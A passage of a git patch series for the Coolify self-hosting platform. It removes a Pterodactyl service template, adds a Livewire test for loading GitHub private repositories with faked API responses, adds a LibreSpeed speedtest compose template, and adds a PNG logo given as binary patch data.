udDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fV0lOR1NfODQ0MwogICAgICAtICdUWj0ke1RJTUVaT05FOi1VVEN9JwogICAgICAtIFdJTkdTX1VTRVJOQU1FPXB0ZXJvZGFjdHlsCiAgICB2b2x1bWVzOgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jaycKICAgICAgLSAnL3Zhci9saWIvZG9ja2VyL2NvbnRhaW5lcnMvOi92YXIvbGliL2RvY2tlci9jb250YWluZXJzLycKICAgICAgLSAnL3Zhci9saWIvcHRlcm9kYWN0eWwvOi92YXIvbGliL3B0ZXJvZGFjdHlsLycKICAgICAgLSAnL3RtcC9wdGVyb2RhY3R5bC86L3RtcC9wdGVyb2RhY3R5bC8nCiAgICAgIC0gJ3dpbmdzLWxvZ3M6L3Zhci9sb2cvcHRlcm9kYWN0eWwvJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9ldGMvY29uZmlnLnltbAogICAgICAgIHRhcmdldDogL2V0Yy9wdGVyb2RhY3R5bC9jb25maWcueW1sCiAgICAgICAgY29udGVudDogImRlYnVnOiBmYWxzZVxudXVpZDogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogYWJjOWFiYzgtYWJjNy1hYmM2LWFiYzUtYWJjNGFiYzNhYmMyXG50b2tlbl9pZDogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogYWJjMWFiYzJhYmMzYWJjNFxudG9rZW46IFJFUExBQ0UgRlJPTSBDT05GSUcgICNleGFtcGxlOiBhYmMxYWJjMmFiYzNhYmM0YWJjNWFiYzZhYmM3YWJjOGFiYzlhYmMxMGFiYzExYWJjMTJhYmMxM2FiYzE0YWJjMTVhYmMxNlxuYXBpOlxuICBob3N0OiAwLjAuMC4wXG4gIHBvcnQ6IDg0NDMgIyB1c2UgcG9ydCA0NDMgSU4gVEhFIFBBTkVMIGR1cmluZyBub2RlIHNldHVwXG4gIHNzbDpcbiAgICBlbmFibGVkOiBmYWxzZVxuICAgIGNlcnQ6IFJFUExBQ0UgRlJPTSBDT05GSUcgI2V4YW1wbGU6IC9ldGMvbGV0c2VuY3J5cHQvbGl2ZS93aW5ncy1hYmNhYmNhYmNhYmNhYmMuZXhhbXBsZS5jb20vZnVsbGNoYWluLnBlbVxuICAgIGtleTogUkVQTEFDRSBGUk9NIENPTkZJRyAjZXhhbXBsZTogL2V0Yy9sZXRzZW5jcnlwdC9saXZlL3dpbmdzLWFiY2FiY2FiY2FiY2FiYy5leGFtcGxlLmNvbS9wcml2a2V5LnBlbVxuICBkaXNhYmxlX3JlbW90ZV9kb3dubG9hZDogZmFsc2VcbiAgdXBsb2FkX2xpbWl0OiAxMDBcbiAgdHJ1c3RlZF9wcm94aWVzOiBbXVxuc3lzdGVtOlxuICByb290X2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWxcbiAgbG9nX2RpcmVjdG9yeTogL3Zhci9sb2cvcHRlcm9kYWN0eWxcbiAgZGF0YTogL3Zhci9saWIvcHRlcm9kYWN0eWwvdm9sdW1lc1xuICBhcmNoaXZlX2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWwvYXJjaGl2ZXNcbiAgYmFja3VwX2RpcmVjdG9yeTogL3Zhci9saWIvcHRlcm9kYWN0eWwvYmFja3Vwc1xuICB0bXBfZGlyZWN0b3J5OiAvdG1wL3B0ZXJvZGFjdHlsXG4gIHVzZXJuYW1lOiBwdGVyb2RhY3R5bFxuICB0aW1lem9uZTogVVRDXG4gIHVzZXI6XG4gICAgcm9vdGxlc3M6XG4gICAgICBlbmFibGVkOiBmYWxzZVxuICAgICAgY29udGFpbmVyX3VpZDogMFxuICAgICAgY29udGFpbmVyX2dpZDogMFxuICAgIHVpZDogOTg4XG4gICAgZ2lkOiA5ODhcbiAgZGlza19jaGVja19pbnRlcnZhbDogMTUwXG4gIGFjdGl2aXR5X3NlbmRfaW50ZXJ2YWw6IDYwXG4gIGFjdGl2aXR5X3NlbmRfY291bnQ6IDEwMFxuICBjaGVja19wZXJtaXNzaW9uc19vbl9ib290OiB0cnVlXG4gIGVuYWJsZV9sb2dfcm90YXRlOiB0cnVlXG4gIHdlYnNvY2tldF9sb2dfY291bnQ6IDE1MFxuICBzZnRwOlxuICAgIGJpbmRfYWRkcmVzczogMC4wLjAuMFxuICAgIGJpbmRfcG9ydDogMjAyMlxuICAgIHJlYWRfb25seTogZmFsc2VcbiAgY3Jhc2hfZGV0ZWN0aW9uOlxuICAgIGVuYWJsZWQ6IHRydWVcbiAgICBkZXRlY3RfY2xlYW5fZXhpdF9hc19jcmFzaDogdHJ1ZVxuICAgIHRpbWVvdXQ6IDYwXG4gIGJhY2t1cHM6XG4gICAgd3JpdGVfbGltaXQ6IDBcbiAgICBjb21wcmVzc2lvbl9sZXZlbDogYmVzdF9zcGVlZFxuICB0cmFuc2ZlcnM6XG4gICAgZG93bmxvYWRfbGltaXQ6IDBcbiAgb3BlbmF0X21vZGU6IGF1dG9cbmRvY2tlcjpcbiAgbmV0d29yazpcbiAgICBpbnRlcmZhY2U6IDE3Mi4yOC4wLjFcbiAgICBkbnM6XG4gICAgICAtIDEuMS4xLjFcbiAgICAgIC0gMS4wLjAuMVxuICAgIG5hbWU6IHB0ZXJvZGFjdHlsX253XG4gICAgaXNwbjogZmFsc2VcbiAgICBkcml2ZXI6IGJyaWRnZVxuICAgIG5ldHdvcmtfbW9kZTogcHRlcm9kYWN0eWxfbndcbiAgICBpc19pbnRlcm5hbDogZmFsc2VcbiAgICBlbmFibGVfaWNjOiB0cnVlXG4gICAgbmV0d29ya19tdHU6IDE1MDBcbiAgICBpbnRlcmZhY2VzOlxuICAgICAgdjQ6XG4gICAgICAgIHN1Ym5ldDogMTcyLjI4LjAuMC8xNlxuICAgICAgICBnYXRld2F5OiAxNzIuMjguMC4xXG4gICAgICB2NjpcbiAgICAgICAgc3VibmV0OiBmZGJhOjE3Yzg6NmM5NDo6LzY0XG4gICAgICAgIGdhdGV3YXk6IGZkYmE6MTdjODo2Yzk0OjoxMDExXG4gIGRvbWFpbm5hbWU6IFwiXCJcbiAgcmVnaXN0cmllczoge31cbiAgdG1wZnNfc2l6ZTogMTAwXG4gIGNvbnRhaW5lcl9waWRfbGltaXQ6IDUxMlxuICBpbnN0YWxsZXJfbGltaXRzOlxuICAgIG1lbW9yeTogMTAyNFxuICAgIGNwdTogMTAwXG4gIG92ZXJoZWFkOlxuICAgIG92ZXJyaWRlOiBmYWxzZVxuICAgIGRlZmF1bHRfbXVsdGlwbGllcjogMS4wNVxuICAgIG11bHRpcGxpZXJzOiB7fVxuICB1c2VfcGVyZm9ybWFudF9pbnNwZWN0OiB0cnVlXG4gIHVzZXJuc19tb2RlOiBcIlwiXG4gIGxvZ19jb25maWc6XG4gICAgdHlwZTogbG9jYWxcbiAgICBjb25maWc6XG4gICAgICBjb21wcmVzczogXCJmYWxzZVwiXG4gICAgICBtYXgtZmlsZTogXCIxXCJcbiAgICAgIG1heC1zaXplOiA1bVxuICAgICAgbW9kZTogbm9uLWJsb2NraW5nXG50aHJvdHRsZXM6XG4gIGVuYWJsZWQ6IHRydWVcbiAgbGluZXM6IDIwMDBcbiAgbGluZV9yZXNldF9pbnRlcnZhbDogMTAwXG5yZW1vdGU6IGh0dHA6Ly9wdGVyb2RhY3R5bDo4MFxucmVtb3RlX3F1ZXJ5OlxuICB0aW1lb3V0OiAzMFxuICBib290X3NlcnZlcnNfcGVyX3BhZ2U6IDUwXG5hbGxvd2VkX21vdW50czogW11cbmFsbG93ZWRfb3JpZ2luczpcbiAgLSBodHRwOi8vcHRlcm9kYWN0eWw6ODBcbiAgLSBQQU5FTCBET01BSU4gIyBleGFtcGxlOiBodHRwczovL3B0ZXJvZGFjdHlsLWFiY2FiY2FiY2FiY2F2Yy5leGFtcGxlLmNvbVxuYWxsb3dfY29yc19wcml2YXRlX25ldHdvcms6IGZhbHNlXG5pZ25vcmVfcGFuZWxfY29uZmlnX3VwZGF0ZXM6IGZhbHNlIgo=",
-        "tags": [
-            "game",
-            "game server",
-            "management",
-            "panel",
-            "minecraft"
-        ],
-        "category": "media",
-        "logo": "svgs/pterodactyl.png",
-        "minversion": "0.0.0",
-        "port": "80, 8443"
-    },
     "qbittorrent": {
         "documentation": "https://docs.linuxserver.io/images/docker-qbittorrent/?utm_source=coolify.io",
         "slogan": "The qBittorrent project aims to provide an open-source software alternative to \u03bcTorrent.",
diff --git a/tests/Feature/GithubPrivateRepositoryTest.php b/tests/Feature/GithubPrivateRepositoryTest.php
new file mode 100644
index 000000000..19474caca
--- /dev/null
+++ b/tests/Feature/GithubPrivateRepositoryTest.php
@@ -0,0 +1,126 @@
+<?php
+
+use App\Livewire\Project\New\GithubPrivateRepository;
+use App\Models\GithubApp;
+use App\Models\PrivateKey;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Http;
+use Livewire\Livewire;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+
+    $this->rsaKey = openssl_pkey_new([
+        'private_key_bits' => 2048,
+        'private_key_type' => OPENSSL_KEYTYPE_RSA,
+    ]);
+    openssl_pkey_export($this->rsaKey, $pemKey);
+
+    $this->privateKey = PrivateKey::create([
+        'name' => 'Test Key',
+        'private_key' => $pemKey,
+        'team_id' => $this->team->id,
+    ]);
+
+    $this->githubApp = GithubApp::create([
+        'name' => 'Test GitHub App',
+        'api_url' => 'https://api.github.com',
+        'html_url' => 'https://github.com',
+        'custom_user' => 'git',
+        'custom_port' => 22,
+        'app_id' => 12345,
+        'installation_id' => 67890,
+        'client_id' => 'test-client-id',
+        'client_secret' => 'test-client-secret',
+        'webhook_secret' => 'test-webhook-secret',
+        'private_key_id' => $this->privateKey->id,
+        'team_id' => $this->team->id,
+        'is_system_wide' => false,
+    ]);
+});
+
+function fakeGithubHttp(array $repositories): void
+{
+    Http::fake([
+        'https://api.github.com/zen' => Http::response('Keep it logically awesome.', 200, [
+            'Date' => now()->toRfc7231String(),
+        ]),
+        'https://api.github.com/app/installations/67890/access_tokens' => Http::response([
+            'token' => 'fake-installation-token',
+        ], 201),
+        'https://api.github.com/installation/repositories*' => Http::response([
+            'total_count' => count($repositories),
+            'repositories' => $repositories,
+        ], 200),
+    ]);
+}
+
+describe('GitHub Private Repository Component', function () {
+    test('loadRepositories fetches and displays repositories', function () {
+        $repos = [
+            ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
+            ['id' => 2, 'name' => 'beta-repo', 'owner' => ['login' => 'testuser']],
+        ];
+
+        fakeGithubHttp($repos);
+
+        Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->assertSet('current_step', 'github_apps')
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSet('current_step', 'repository')
+            ->assertSet('total_repositories_count', 2)
+            ->assertSet('selected_repository_id', 1);
+    });
+
+    test('loadRepositories can be called again to refresh the repository list', function () {
+        $initialRepos = [
+            ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
+        ];
+
+        fakeGithubHttp($initialRepos);
+
+        $component = Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSet('total_repositories_count', 1);
+
+        // Simulate new repos becoming available after changing access on GitHub
+        $updatedRepos = [
+            ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
+            ['id' => 2, 'name' => 'beta-repo', 'owner' => ['login' => 'testuser']],
+            ['id' => 3, 'name' => 'gamma-repo', 'owner' => ['login' => 'testuser']],
+        ];
+
+        fakeGithubHttp($updatedRepos);
+
+        $component
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSet('total_repositories_count', 3)
+            ->assertSet('current_step', 'repository');
+    });
+
+    test('refresh button is visible when repositories are loaded', function () {
+        $repos = [
+            ['id' => 1, 'name' => 'alpha-repo', 'owner' => ['login' => 'testuser']],
+        ];
+
+        fakeGithubHttp($repos);
+
+        Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->call('loadRepositories', $this->githubApp->id)
+            ->assertSeeHtml('title="Refresh Repository List"');
+    });
+
+    test('refresh button is not visible before repositories are loaded', function () {
+        Livewire::test(GithubPrivateRepository::class, ['type' => 'private-gh-app'])
+            ->assertDontSeeHtml('title="Refresh Repository List"');
+    });
+});

From 907b3d04c1e11aa345bee2f0866490d61e70722e Mon Sep 17 00:00:00 2001
From: Diogo Carvalho <diogocarvalho_@live.com.pt>
Date: Wed, 25 Feb 2026 23:22:38 +0000
Subject: [PATCH 023/213] Add speedtest service

---
 templates/compose/speedtest.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 templates/compose/speedtest.yaml

diff --git a/templates/compose/speedtest.yaml b/templates/compose/speedtest.yaml
new file mode 100644
index 000000000..e0d915fe7
--- /dev/null
+++ b/templates/compose/speedtest.yaml
@@ -0,0 +1,22 @@
+# documentation: https://github.com/librespeed/speedtest
+# slogan: Self-hosted Speed Test for HTML5 and more.
+# category: devtools
+# tags: speedtest, internet-speed
+# logo: svgs/speedtest.svg
+# port: 82
+
+services:
+  speedtest:
+    container_name: speedtest
+    image: 'ghcr.io/librespeed/speedtest:latest'
+    environment:
+      - SERVICE_URL_SPEEDTEST_82
+      - MODE=standalone
+      - TELEMETRY=false
+      - DISTANCE=km
+      - WEBPORT=82
+    healthcheck:
+      test: 'curl 127.0.0.1:82 || exit 1'
+      timeout: 1s
+      interval: 1m0s
+      retries: 1

From e9c980d3d513e9daefd64021f11fb9980269d6bf Mon Sep 17 00:00:00 2001
From: Diogo Carvalho <diogocarvalho_@live.com.pt>
Date: Wed, 25 Feb 2026 23:25:08 +0000
Subject: [PATCH 024/213] Add logo

---
 public/svgs/librespeed.png | Bin 0 -> 110042 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 public/svgs/librespeed.png

diff --git a/public/svgs/librespeed.png b/public/svgs/librespeed.png
new file mode 100644
index 0000000000000000000000000000000000000000..1405e3c187f4d99c4bc1c5f3cb529481d6d15c62
GIT binary patch
literal 110042
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
